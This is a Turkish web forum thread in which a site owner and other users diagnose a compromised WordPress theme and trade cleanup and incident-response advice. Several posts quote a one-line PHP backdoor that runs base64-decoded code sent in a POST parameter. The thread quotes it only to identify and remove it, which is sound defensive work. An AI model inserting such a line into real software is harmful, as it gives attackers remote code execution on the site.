• 16-01-2015, 11:37:21
    #19
    JustRulz adlı üyeden alıntı: mesajı görüntüle
    Timthumb içindemiydi bu encode edilmiş veri ?
    Aynen, diğeri de temanın index dosyasında.
  • 16-01-2015, 11:49:52
    #20
    JustRulz adlı üyeden alıntı: mesajı görüntüle
    Timthumb içindemiydi bu encode edilmiş veri ?
    <?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?><?php get_header(); ?>
    üzgünüm bu backdoor : / cspdnbtxql request ile kod çalıştırabilir ... işi bilen kimse ise daha büyük güzelliklerde yapabilir .. sunucu yöneticine ulaş tek tek uğraşmadan tüm dizininde benzer kodları aratsın

    find . -name "*.php" -print | xargs sed -i xxxxx
    find . -type f | xargs grep " " çeşitlendirebilir söylersen anlar o...

    bulup bunları temizledikten sonra logları incele.

    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
    bu önemsiz veri işlendiğinde not hotlink adlı resmi çekiyor, senin verilerini farklı birileri kullanmasın diye...
  • 16-01-2015, 12:01:20
    #21
    Teşekkürler @JustRulz; site vps'de barınıyor. Vps'de IHS telekom'da. Ticket attım ama çok yardımcı olacaklarını sanmıyorum vps'i sizin yönetmeniz gerekli diye baştan savma bir mesaj yazacaklar kesin.
  • 16-01-2015, 12:25:03
    #22
    CND adlı üyeden alıntı: mesajı görüntüle
    Teşekkürler @JustRulz; site vps'de barınıyor. Vps'de IHS telekom'da. Ticket attım ama çok yardımcı olacaklarını sanmıyorum vps'i sizin yönetmeniz gerekli diye baştan savma bir mesaj yazacaklar kesin.
    imgdata kısmında sorun yok. Verdiğin diğer kodda ise, Sorguya işlem yaptırıyor. Aslında bu kısımda temanın bir özelliği ile alakalı olabilir. Bunu en iyi anlamak için kaynak kodlarını kottrol et ( Hem sitede ki hemde tarayıcıda ki Cache sil. Sonra siteye girip kaynak kodlarına bak bakalım header'in üstünde ne tür kodlar geziyor.)

    Dikkat etmen gereken bir diğer şey, bir döngü içinde bu kodlar çalıştırılıyor olabilir. Yani 5 sayfa gösteriminde bir görüntüleniyor olabilir. Bu yüzden farklı tarayıcılarda siteyi açıp kodlara bak.
    Cacheyi devre dışı bırak ve f5 yapıp sayfayı yenile. Belki birşeyler çıkar.


    Yukarıda verdiğim eklentiyi ( Exploit Scanner ) kurup araçlar> Exploit Scanner yolunu izleyerek tarama yap. Çıkan sonuçları kontrol et bi hocam. özellikle
    eval(function
    i ara. js iler içine gömülmüş bir kod ile, bu kodlar oluşturuluyor olabilir.
  • 16-01-2015, 12:51:31
    #23
    MimariuS adlı üyeden alıntı: mesajı görüntüle
    imgdata kısmında sorun yok. Verdiğin diğer kodda ise, Sorguya işlem yaptırıyor. Aslında bu kısımda temanın bir özelliği ile alakalı olabilir. Bunu en iyi anlamak için kaynak kodlarını kottrol et ( Hem sitede ki hemde tarayıcıda ki Cache sil. Sonra siteye girip kaynak kodlarına bak bakalım header'in üstünde ne tür kodlar geziyor.)

    Dikkat etmen gereken bir diğer şey, bir döngü içinde bu kodlar çalıştırılıyor olabilir. Yani 5 sayfa gösteriminde bir görüntüleniyor olabilir. Bu yüzden farklı tarayıcılarda siteyi açıp kodlara bak.
    Cacheyi devre dışı bırak ve f5 yapıp sayfayı yenile. Belki birşeyler çıkar.


    Yukarıda verdiğim eklentiyi ( Exploit Scanner ) kurup araçlar> Exploit Scanner yolunu izleyerek tarama yap. Çıkan sonuçları kontrol et bi hocam. özellikle
    eval(function
    i ara. js iler içine gömülmüş bir kod ile, bu kodlar oluşturuluyor olabilir.
    IHS'den gelen cevap


    Alıntı
    Merhaba,

    Tarafımızca yapılan kontrollerde /home//xxx/public_html/ dizininde bulunan siteniz içerisinde zararlı içeriklerin olduğu görülmektedir. Bu zararlı içerikler kullanmakta olduğunuz tema veya eklentilerden kaynaklanıyor olabilir. WordPress yazılımınız için baştan kurulum yapabilir ya da web tasarım veya yazılımcınızdan destek alabilirsinz.

    İyi Çalışmalar
    Hadi canım biz bilmiyorduk onu zaten. Exploit Scanner kuruyorum şimdi.

    --R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 12:51:31 -->-> Daha önceki mesaj 12:30:12 --

    Error logları inceledim sitenin,

    uzun bir süredir aynı hataları veriyormuş

    Alıntı
    [26-Nov-2014 15:48:40 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/xxx/public_html/wp-content/themes/news/index.php on line 1
    [26-Nov-2014 15:50:29 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/xxx/public_html/wp-content/themes/news/index.php on line 1
    [09-Dec-2014 13:29:45 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/xxx/public_html/wp-content/themes/news/index.php on line 1
    [17-Dec-2014 17:36:54 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/xxx/public_html/wp-content/themes/news/index.php on line 1
    [30-Dec-2014 14:17:25 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/xxx/public_html/wp-content/themes/news/index.php on line 1
    [16-Jan-2015 11:11:54 Europe/Helsinki] PHP Fatal error: Call to undefined function get_header() in /home/dxxx/public_html/wp-content/themes/news/index.php on line 1
    index.php de 1. sıradaki kod da bu:

    Alıntı
    <?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?><?php get_header(); ?>
    Bunu kaldırsam mı?
  • 16-01-2015, 12:54:25
    #24
    Başka bir cevap verselerdi Hostu onlara taşıcaktım ama vermediler . Şaşırmadım
    CND adlı üyeden alıntı: mesajı görüntüle
    IHS'den gelen cevap


    Bunu kaldırsam mı?
    <?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?>
    bunu sil bence (:
  • 16-01-2015, 13:15:45
    #25
    backdoor olduğunu söyledim size zaten
    direk silin , bunun haricinde .htaccess lerinizi kontrol edin
    error log haricinde kullanmış olduğunuz yönetim arayüzünüzde bulunan daha gelişmiş log kontrol scriptlerinizi kullanarak harici olarak dizinlerinizde ne tür işlemler yapmışlar ya da remote olarak çalıştırdıkları harici bir veri varmı ? sonuçta sizin herhangi bir dosyanıza mudahale etmiş olmalı diğer dizinlerde yetkisiz oldukları anlamına gelmez.

    config bilgileriniz ile ftp bilgileriniz administrator bilgileriniz aynı olmasın , bunlarıda değiştirmeniz faydanıza , script ya da sunucu tabanın haricinde crackli bir uygulama indirip sonrasında pcnizde ftpnize bağlanmanız sonucuda bu tür olaylar olabiliyor bu yüzden kendi makinanızında güvenli olduğundan emin olun.

    1 - kendi bilgisayarım temiz emin oldum.
    2 - .htaccess , js , php dosyalarımın temiz olduğundan emin oldum ( default olarak kendi makinanızda varsa direk tekrar yükleyin verilerinizi )
    3 - tekrar kontrol amaçlı browserver ayarlarınızda ufak tefek pluginler var as a google bot gibi kendiniz sitenize girebilirsiniz hala exploit aktifse referer google olduğundan tekrar yonlenecektir.girdim baktım birşey görünmüyor.
    4 - eklentilerimin ve kullandığım ana scriptin güncel olduğundan emin oldum ( thimthumb vb eklentiler ciddi güvenlik açıklarına sebep olabiliyor tüm hepsinin güncel olduğundan emin olmam şart )
    5 - 0day buglar olabilir o yüzden loglarımıda inceledim uzaktan içerden birşekilde anormal veri transferlerinin olmadığından eminim.
    6- herşey normal son olarak panel , admin , mysql bilgilerimi güncelledim.

    Sunucu tabanında geçmişte yazdığım birkaç satır yazı da aklınızın bir köşesine yazın.

    bakın
    sunucu sahipleri bu tür konularda ilk olarak
    mevcut loglari iyi bir şekilde izlemeli
    soru 1
    sunucuya ilk olarak nereden girildi ?

    a ) sunucu üzerindeki bir script açığı ile
    b ) sunucu üzerindeki bir sitenin kendi dizinine herhangi bir listpatch vs tarzı dosya atma ile.

    soru 2

    Sisteme girildiğinde neler yapıldı ?

    a ) sadece tek bir dizinde mi işlem yapıldı ?
    b ) diğer dizinlere backdoor bırakıldı mı ?
    c ) sunucu üzerinde ki sitelerin config bilgileri ya da bu bilgileri kullanarak databaselerine erişim sağlandı mı ?
    d ) config bilgileri ile ftpler aynı mı ? ya da mysql da ki hashlarin kırılması ile ftp ya da hosting yonetim kısmında giriş yapılabiliniyor mu ?

    3 sunucuda sadece izleme ya da okuma şeklinde mi rol aldılar ?

    a ) ya da backconnect olup root yetkisi aldılar mı ?
    b ) rootkit kurup arka planda bir port açıp sunucuyu dinliyorlar mı ?

    Ne yapacağız

    ilgili siteleri suspend edin ve ilk olarak atılan dosyaları silin.
    ftp şifrelerini değiştirin.
    mysql bilgilerini değiştirin.
    kernel sürümünüz ya da ne kullaniyorsanız ilgili sürümünüzün aktif bir açığı varmı kontrol edip update edin.
    sadece bu kernel sürümünüz ile ilgili olmayabilir kullandığınız phpsürüm ya da eklenti olarak ne kullaniyorsanız hepsini stabil hale getirin.
    kullanıcılarınızın scriptlerinin güncel olduğundan emin olun.
    Loglardan ilgili ipleri alıp savcılığa sikayet edin , şikayet ettiğinizi r10 ve benzeri forumlarda anlatın.Sunucunuzda basit önlemler alın , basit listpatchlerin çalişmasini engelleyin , uzaktan root olarak baglanma portunuzu değiştirin , kullanıcılarınızı güvenlik konusunda bilinçlendirin.
  • 16-01-2015, 16:05:31
    #26
    biri sisteme girmiş anlaşılan . geçmiş olsun..
  • 16-01-2015, 18:44:11
    #27
    Sunucuda Clamav çalıştırdım

    170K dosya tarafı 186 tane şüpheli dosya tespit etti.

    Benim problem yaşadığım sitenin dosyalarında problem tespit edemedi. :/